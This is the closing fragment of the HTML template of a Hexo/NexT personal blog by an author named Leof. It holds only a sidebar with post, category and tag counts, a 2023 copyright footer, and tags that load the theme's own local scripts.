    <img class="site-author-image" itemprop="image" alt="Leof"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">Leof</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Leof</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
